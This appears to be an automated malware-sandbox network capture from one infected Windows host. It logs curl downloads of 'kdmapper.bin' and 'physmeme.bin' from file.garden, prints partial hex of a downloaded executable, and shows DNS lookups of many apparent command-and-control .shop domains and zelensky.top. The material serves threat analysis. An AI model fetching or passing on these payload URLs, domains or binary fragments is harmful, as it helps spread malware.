Sep 30, 2024 18:19:12.875519991 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.875534058 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.875561953 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.875586033 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.877178907 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.877207041 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.877238035 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.877247095 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.877270937 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.877288103 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.924810886 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.924837112 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.924926043 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.924941063 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.924992085 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.924993038 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.925007105 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.925040960 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.925045967 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.925086021 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.925087929 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.925124884 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.961726904 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.961755037 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:15.138222933 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:15.138259888 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:15.138381958 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:15.141721010 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:15.141733885 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:15.789032936 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:15.789113045 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:15.792520046 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:15.792529106 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:15.792845011 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:15.843214989 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:15.861812115 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:15.907392025 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.270400047 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.270427942 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.270472050 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.270484924 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.270507097 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:16.270510912 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.270528078 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.270587921 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:16.270587921 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:16.359731913 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.359821081 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.359848022 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:16.359849930 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.359909058 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:16.362453938 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:16.362473965 CEST	443	65264	104.102.49.254	192.168.2.7
Sep 30, 2024 18:19:16.362528086 CEST	65264	443	192.168.2.7	104.102.49.254
Sep 30, 2024 18:19:16.362535000 CEST	443	65264	104.102.49.254	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:19:08.854887962 CEST	60707	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:08.867727995 CEST	53	60707	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:14.537928104 CEST	49437	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:14.546919107 CEST	53	49437	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:15.018203974 CEST	59776	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:15.027813911 CEST	53	59776	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:15.031016111 CEST	52053	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:15.048768997 CEST	53	52053	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:15.051876068 CEST	61249	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:15.061055899 CEST	53	61249	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:15.063864946 CEST	63135	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:15.073913097 CEST	53	63135	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:15.076597929 CEST	59487	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:15.087165117 CEST	53	59487	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:15.089811087 CEST	60439	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:15.099920034 CEST	53	60439	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:15.102262020 CEST	58230	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:15.111754894 CEST	53	58230	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:15.114119053 CEST	50957	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:15.123739004 CEST	53	50957	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:15.126127958 CEST	63918	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:15.133461952 CEST	53	63918	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:47.543602943 CEST	56262	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:48.554064989 CEST	56262	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:19:48.580282927 CEST	53	56262	1.1.1.1	192.168.2.7
Sep 30, 2024 18:19:48.580482006 CEST	53	56262	1.1.1.1	192.168.2.7
Sep 30, 2024 18:20:13.263367891 CEST	55829	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:20:13.355524063 CEST	53	55829	1.1.1.1	192.168.2.7
Sep 30, 2024 18:20:21.134670973 CEST	51052	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:20:21.144263983 CEST	53	51052	1.1.1.1	192.168.2.7
Sep 30, 2024 18:20:30.074436903 CEST	54681	53	192.168.2.7	1.1.1.1
Sep 30, 2024 18:20:30.167287111 CEST	53	54681	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 18:19:08.854887962 CEST	192.168.2.7	1.1.1.1	0xfea1	Standard query (0)	file.garden	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:14.537928104 CEST	192.168.2.7	1.1.1.1	0x40b7	Standard query (0)	tiddymarktwo.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.018203974 CEST	192.168.2.7	1.1.1.1	0x1b98	Standard query (0)	surveriysiop.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.031016111 CEST	192.168.2.7	1.1.1.1	0x1357	Standard query (0)	captainynfanw.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.051876068 CEST	192.168.2.7	1.1.1.1	0xec3c	Standard query (0)	tearrybyiwo.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.063864946 CEST	192.168.2.7	1.1.1.1	0x5fbe	Standard query (0)	appleboltelwk.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.076597929 CEST	192.168.2.7	1.1.1.1	0xbb7a	Standard query (0)	tendencerangej.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.089811087 CEST	192.168.2.7	1.1.1.1	0xe13c	Standard query (0)	fossillargeiw.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.102262020 CEST	192.168.2.7	1.1.1.1	0x16c0	Standard query (0)	coursedonnyre.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.114119053 CEST	192.168.2.7	1.1.1.1	0x6884	Standard query (0)	strappystyio.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.126127958 CEST	192.168.2.7	1.1.1.1	0x3054	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:47.543602943 CEST	192.168.2.7	1.1.1.1	0x3d41	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:48.554064989 CEST	192.168.2.7	1.1.1.1	0x3d41	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:13.263367891 CEST	192.168.2.7	1.1.1.1	0xf900	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:21.134670973 CEST	192.168.2.7	1.1.1.1	0x8a7a	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:30.074436903 CEST	192.168.2.7	1.1.1.1	0x681e	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 18:19:08.867727995 CEST	1.1.1.1	192.168.2.7	0xfea1	No error (0)	file.garden		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:08.867727995 CEST	1.1.1.1	192.168.2.7	0xfea1	No error (0)	file.garden		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.027813911 CEST	1.1.1.1	192.168.2.7	0x1b98	Name error (3)	surveriysiop.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.048768997 CEST	1.1.1.1	192.168.2.7	0x1357	Name error (3)	captainynfanw.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.061055899 CEST	1.1.1.1	192.168.2.7	0xec3c	Name error (3)	tearrybyiwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.073913097 CEST	1.1.1.1	192.168.2.7	0x5fbe	Name error (3)	appleboltelwk.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.087165117 CEST	1.1.1.1	192.168.2.7	0xbb7a	Name error (3)	tendencerangej.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.099920034 CEST	1.1.1.1	192.168.2.7	0xe13c	Name error (3)	fossillargeiw.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.111754894 CEST	1.1.1.1	192.168.2.7	0x16c0	Name error (3)	coursedonnyre.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.123739004 CEST	1.1.1.1	192.168.2.7	0x6884	Name error (3)	strappystyio.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:15.133461952 CEST	1.1.1.1	192.168.2.7	0x3054	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:48.580282927 CEST	1.1.1.1	192.168.2.7	0x3d41	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:19:48.580482006 CEST	1.1.1.1	192.168.2.7	0x3d41	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:13.355524063 CEST	1.1.1.1	192.168.2.7	0xf900	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:21.144263983 CEST	1.1.1.1	192.168.2.7	0x8a7a	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:30.167287111 CEST	1.1.1.1	192.168.2.7	0x681e	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

file.garden

steamcommunity.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49701	188.114.96.3	443	6500	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:19:09 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:19:09 UTC	809	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:19:09 GMT Content-Type: application/octet-stream Content-Length: 2284739 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Fri, 20 Sep 2024 19:21:00 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 853068 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCzZKlRl3cpqXbQVPPXaLHjDtfEB00Jj93yJggZzOVwPgTGCuHp3i6AtUgwYNUG2ZKo57FZQNmibH1QbKGPifzi6nepx4UdUfbSpy8CpSNziE86j8vYdyEADRGQcqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb58870089419cf-EWR
2024-09-30 16:19:09 UTC	560	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
2024-09-30 16:19:09 UTC	1369	IN	Data Raw: 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: .rdata0 @@.data G@.didat0@.rsrc@@@.reloc<# $@B
2024-09-30 16:19:09 UTC	1369	IN	Data Raw: 1c 00 55 8b ec 83 ec 4c ff 75 08 8d 4d b4 e8 2a 02 00 00 8b 4d f4 83 f9 08 73 0a 8b 45 0c 89 44 8d b4 ff 45 f4 8d 4d b4 e8 48 02 01 00 c9 c2 08 00 56 ff 74 24 08 8b f1 33 c0 89 06 89 46 04 89 46 08 89 46 0c 88 46 10 e8 5c 03 00 00 8b c6 5e c2 04 00 b8 35 26 43 00 e8 92 d7 01 00 51 51 53 56 8b f1 89 75 f0 e8 62 81 00 00 33 db c7 06 f8 35 43 00 8d 8e 38 10 00 00 89 5d fc e8 2d 4a 00 00 8d 8e f8 20 00 00 c6 45 fc 01 e8 27 ba 00 00 8d 8e 98 22 00 00 89 9e e8 21 00 00 89 9e ec 21 00 00 e8 4a 01 00 00 8d 8e e8 45 00 00 e8 3f 01 00 00 8b 4d 08 85 c9 c6 45 fc 04 0f 94 c0 89 9e d4 21 00 00 88 86 d0 21 00 00 85 c9 75 23 68 f0 92 00 00 e8 d7 d6 01 00 59 89 45 ec c6 45 fc 05 85 c0 74 09 8b c8 e8 91 a0 00 00 eb 06 8b c3 eb 02 8b c1 89 86 d4 21 00 00 8a 80 a1 71 00 00 Data Ascii: ULuM*MsEDEMHVt$3FFFF\^5&CQQSVub35C8]-J E'"!!JE?ME!!u#hYEEt!q
2024-09-30 16:19:09 UTC	1369	IN	Data Raw: a5 fa ff ff 6a 02 b9 98 10 44 00 e8 3f 53 00 00 5e c2 04 00 53 56 8b f1 33 db 57 53 8b 3e 38 9e 3c 22 00 00 74 3d 8b 86 d8 6c 00 00 8b 4f 10 83 c0 14 53 50 ff 15 78 32 43 00 8b ce ff 57 10 8b ce e8 05 22 00 00 85 c0 74 15 83 be f4 21 00 00 75 75 0c 8b 44 24 10 39 58 04 0f 97 c0 eb 3c 32 c0 eb 38 e8 85 08 00 00 8b 4f 10 52 50 ff 15 78 32 43 00 8b ce ff 57 10 68 70 36 43 00 8b ce e8 3d 26 00 00 85 c0 74 11 ff 74 24 10 8b ce e8 db 04 00 00 84 c0 74 02 b3 01 8a c3 5f 5e 5b c2 04 00 80 b9 d4 6c 00 00 00 8b 54 24 04 74 1a 8b c2 f7 d8 83 e0 0f 03 d0 83 b9 c8 6c 00 00 03 75 05 83 c2 10 eb 03 83 c2 08 8b c2 c2 04 00 55 8b e9 80 bd ce 6c 00 00 00 75 04 32 c0 eb 41 8b 45 00 53 56 57 8b 70 14 8b ce ff 15 78 32 43 00 8b cd ff d6 ff 74 24 14 8b cd 8b f8 8b f2 e8 13 ff Data Ascii: jD?S^SV3WS>8<"t=lOSPx2CW"t!uuD$9X<28ORPx2CWhp6C=&tt$t_^[lT$tluUlu2AESVWpx2Ct$
2024-09-30 16:19:09 UTC	1369	IN	Data Raw: 01 75 04 6a 03 eb 08 2c 02 3c 02 77 03 6a 04 59 8b c1 c2 08 00 b8 73 26 43 00 e8 1e cd 01 00 83 ec 18 53 33 db 8b c1 89 45 f0 89 5d dc 89 5d e0 89 5d e4 89 5d e8 88 5d ec 53 53 8d 4d dc 89 5d fc 51 8b c8 e8 36 1d 00 00 84 c0 0f 84 83 00 00 00 56 57 8b 7d e0 8d 4d dc 6a 01 e8 97 f8 ff ff 8b 4d e0 8b 45 dc 8b 75 08 88 5c 01 ff 8d 47 01 50 8b ce e8 f6 f9 ff ff 8b 45 f0 83 b8 c8 6c 00 00 03 75 0f ff 76 04 ff 36 ff 75 dc e8 6f fd 00 00 eb 2d f6 80 0c 46 00 00 01 74 17 d1 ef 57 ff 36 ff 75 dc e8 19 fd 00 00 8b 06 33 c9 66 89 0c 78 eb 0d ff 76 04 ff 36 ff 75 dc e8 89 fc 00 00 ff 36 e8 11 1f 02 00 59 50 8b ce e8 9e f9 ff ff 5f b3 01 5e 8b 45 dc c7 45 fc 02 00 00 00 85 c0 74 19 80 7d ec 00 74 0c ff 75 e4 50 e8 19 d5 00 00 8b 45 dc 50 e8 f9 1e 02 00 59 8b 4d f4 8a Data Ascii: uj,<wjYs&CS3E]]]]]SSM]Q6VW}MjMEu\GPEluv6uo-FtW6u3fxv6u6YP_^EEt}tuPEPYM
2024-09-30 16:19:09 UTC	1369	IN	Data Raw: 83 f8 01 75 03 8d 69 01 8d b3 28 10 00 00 55 8b ce e8 13 fd ff ff 55 ff 36 8b cf e8 a9 a8 00 00 e9 90 04 00 00 8b cf e8 3b a9 00 00 8b c8 89 44 24 20 c1 e9 02 8d ab 08 21 00 00 80 e1 01 88 8b 06 21 00 00 8b c8 c1 e9 03 80 e1 01 88 8b 07 21 00 00 c6 83 08 22 00 00 00 c6 45 00 00 a8 01 74 29 8b cf e8 ff a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 55 8b cf e8 4b a8 00 00 8b 44 24 20 c6 84 1e 08 21 00 00 00 a8 02 74 2b 8b cf e8 d2 a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 8d 83 08 22 00 00 8b cf 50 e8 18 a8 00 00 c6 84 1e 08 22 00 00 00 80 bb 06 21 00 00 00 74 0d 8b cf e8 9e a8 00 00 89 83 08 23 00 00 80 bb 07 21 00 00 00 74 0d 8b cf e8 88 a8 00 00 89 83 0c 23 00 00 c6 83 05 21 00 00 01 e9 c4 03 00 00 8b cf e8 6f a8 00 00 8b cf 89 83 00 11 00 Data Ascii: ui(UU6;D$ !!!"Et);rVUKD$ !t+;rV"P"!t#!t#!o
2024-09-30 16:19:09 UTC	1369	IN	Data Raw: cb e8 09 17 00 00 e9 e2 09 00 00 33 c9 8d 45 40 51 51 51 51 50 8b 83 d4 21 00 00 8d b3 38 10 00 00 05 24 60 00 00 50 6a 04 51 8b ce e8 1c 37 00 00 89 75 3c eb 03 88 4d 5a 57 8d 4d 1c e8 5b a4 00 00 83 7d 34 00 74 b7 8d 4d 1c e8 89 a2 00 00 0f b7 c0 8d 4d 1c 89 83 fc 21 00 00 c6 83 0c 22 00 00 00 e8 5a a2 00 00 8d 4d 1c 0f b6 f0 e8 66 a2 00 00 0f b7 c0 8d 4d 1c 89 83 04 22 00 00 c1 e8 0e 24 01 88 83 0c 22 00 00 e8 4a a2 00 00 0f b7 c8 89 8b 08 22 00 00 89 b3 00 22 00 00 3b cf 73 0c 8b cb e8 41 f7 ff ff e9 3f 09 00 00 8b c6 6a 02 5a 83 e8 73 74 2a 83 e8 01 74 1b 83 e8 06 74 09 83 e8 01 75 28 6a 05 eb 02 6a 03 58 89 83 00 22 00 00 8b f0 eb 17 89 93 00 22 00 00 8b f2 eb 0d 33 f6 c7 83 00 22 00 00 01 00 00 00 46 89 b3 f4 21 00 00 83 fe 75 74 0e 83 fe 01 75 0e Data Ascii: 3E@QQQQP!8$`PjQ7u<MZWM[}4tMM!"ZMfM"$"J"";sA?jZst*ttu(jjX""3"F!utu
2024-09-30 16:19:09 UTC	1369	IN	Data Raw: 3b f8 76 22 68 00 08 00 00 ff 75 54 8b cf 2b c8 51 8d 8d d0 df ff ff 03 c1 50 8b c1 8d 4d 00 57 50 e8 1a 3b 00 00 8b 4d 54 33 c0 66 39 01 75 14 6a 01 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 30 d4 00 00 56 8b cb e8 a2 f2 ff ff e9 3f 01 00 00 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 db ec 00 00 8b 46 0c 2b 45 50 f7 46 08 00 04 00 00 8d 78 e0 74 03 8d 78 d8 85 ff 0f 8e f6 00 00 00 8d 8e 28 10 00 00 57 e8 eb f1 ff ff 57 8d be 28 10 00 00 ff 37 8d 4d 1c e8 7a 9d 00 00 68 78 36 43 00 ff 75 54 e8 59 0f 02 00 59 59 85 c0 0f 85 c2 00 00 00 83 be 2c 10 00 00 14 0f 82 b5 00 00 00 8b 0f 0f b6 41 0b 99 8b f0 8b fa 0f b6 41 0a 0f a4 f7 08 99 c1 e6 08 03 f0 0f b6 41 09 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 0f b6 41 08 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 8b 03 13 fa 0f Data Ascii: ;v"huT+QPMWP;MT3f9ujhQP0V?hQPF+EPFxtx(WW(7Mzhx6CuTYYY,AAAA
2024-09-30 16:19:09 UTC	1369	IN	Data Raw: 00 00 8b 83 d4 21 00 00 80 b8 24 61 00 00 00 75 0d e8 ae e7 00 00 c6 45 6b 00 84 c0 74 04 c6 45 6b 01 8b cb e8 a5 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 8d bb 7c 22 00 00 57 05 24 60 00 00 8d b3 38 10 00 00 50 6a 05 51 8b ce e8 3e 2c 00 00 80 bb 74 22 00 00 00 74 7d 8d 83 8c 22 00 00 6a 08 50 8d 45 28 50 e8 33 d8 01 00 83 c4 0c 85 c0 74 64 80 7d 6b 00 8d 43 32 50 50 75 5e 68 83 00 00 00 e8 ee eb ff ff 8b 8b d4 21 00 00 81 c1 24 60 00 00 e8 35 be 00 00 8b cb e8 22 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 57 05 24 60 00 00 50 6a 05 51 8b ce e8 c7 2b 00 00 80 bb 74 22 00 00 00 8d 83 8c 22 00 00 75 89 89 75 50 eb 22 6a 06 e8 93 eb ff ff 6a 0b b9 98 10 44 00 c6 83 dd 6c 00 00 01 e8 e2 Data Ascii: !$auEktEkE(3PQx"EP!\|"W$`8PjQ>,t"t}"jPE(P3td}kC2PPu^h!$`5"E(3PQx"EP!W$`PjQ+t""uuP"jjDl
2024-09-30 16:19:09 UTC	1369	IN	Data Raw: ff 93 00 00 8b 8b 04 22 00 00 33 d2 c1 e9 06 42 8b f8 c7 86 fc 10 00 00 02 00 00 00 8a 46 18 22 ca 88 8e f8 10 00 00 3a c2 75 08 89 96 fc 10 00 00 eb 0b 84 c0 75 07 83 a6 fc 10 00 00 00 8b 4e 08 8b c1 c1 e8 03 22 c2 88 86 98 10 00 00 8b c1 c1 e9 05 c1 e8 04 22 ca 22 c2 88 8e fa 10 00 00 83 7d 64 02 8b 4d 60 88 86 99 10 00 00 75 09 f6 c1 40 74 04 8a c2 eb 02 32 c0 88 86 f0 10 00 00 8a 86 94 10 00 00 22 c2 c1 e9 0a 88 86 f1 10 00 00 83 e1 0f 0f b6 c0 ba 00 00 02 00 d3 e2 f7 d8 1b c0 f7 d0 23 c2 89 86 f4 10 00 00 0f b6 86 9b 10 00 00 f7 d8 1b c0 83 e0 05 89 86 9c 10 00 00 b8 ff 1f 00 00 3b f8 72 02 8b f8 57 8d 85 8c df ff ff 50 8d 4d 30 e8 8a 92 00 00 c6 84 3d 8c df ff ff 00 8d 85 8c df ff ff 68 00 08 00 00 8d 7e 28 57 50 e8 4b e2 00 00 8b 4d 58 8b c1 0b 45 Data Ascii: "3BF":uuN"""}dM`u@t2"#;rWPM0=h~(WPKMXE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49704	188.114.96.3	443	5392	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:19:12 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:19:12 UTC	822	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:19:12 GMT Content-Type: application/octet-stream Content-Length: 370176 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Sun, 22 Sep 2024 19:01:04 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 681395 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AnPWeW%2FRMXheSqTp3Tvn7%2B7isAvLYDfRfJsECkkB6arC2LIEzquowJWzlSLpaCP%2FLlt7Z6%2BdcMaS%2BJSe8C3CAR6dPE3Hgz%2F031FYOPDiY9AZLPBK%2BLdjeKa7qRp0Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb58882ae650c8a-EWR
